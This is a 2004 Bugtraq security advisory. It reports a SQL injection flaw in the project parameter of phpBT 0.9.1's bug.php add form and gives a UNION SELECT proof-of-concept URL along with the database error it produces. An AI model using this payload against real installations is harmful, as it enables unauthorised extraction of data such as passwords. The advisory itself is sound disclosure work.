SQL Injection in phpBT (bug.php) add project

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL Injection in phpBT (bug.php) add project
From: jessica soules <admin@xxxxxxxxxxx>
Date: 12 Nov 2004 21:59:09 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


 _   _                ______           _    
| | | |               |  _  \         | |   
| |_| | _____      __ | | | |__ _ _ __| | __
|  _  |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V  V /  | |/ / (_| | |  |   < 
\_| |_/\___/ \_/\_/   |___/ \__,_|_|  |_|\_\

http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author: How Dark
Date:   November 13, 2004
URL:    http://www.howdark.com

Affected Software:              PHP Bug Traq
Software Version:               0.9.1
Software URL:           http://phpbt.sourceforge.net/

Attack:                 SQL Injection, allowing people to minipulate the query 
into pulling data
                        they should not previously be able too obtain. (Such as 
passwords)


Description:            project variable is left open..

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

When forms come up for you to add a bug, the project selection is open
to sql injection.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

bug.php?op=add&project=
bug.php?op=add&project=0%20union%20select%201

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// SQL Error
----------------------------------------------------------------------------------------------------------------------------------

DB Error: syntax error
select project_name from project where project_id = \' [nativecode=1064 ** You 
have an error in your SQL syntax. Check the manual that corresponds to your 
MySQL server version for the right syntax to use near '\'' at line 1]

----------------------------------------------------------------------------------------------------------------------------------

xxx

;eof

Prev by Date: SQL Injection in phpBT (bug.php - Add)
Next by Date: Multiple XSS holes in TheFaceBook
Previous by thread: SQL Injection in phpBT (bug.php - Add)
Next by thread: Multiple XSS holes in TheFaceBook
Index(es):
- Date
- Thread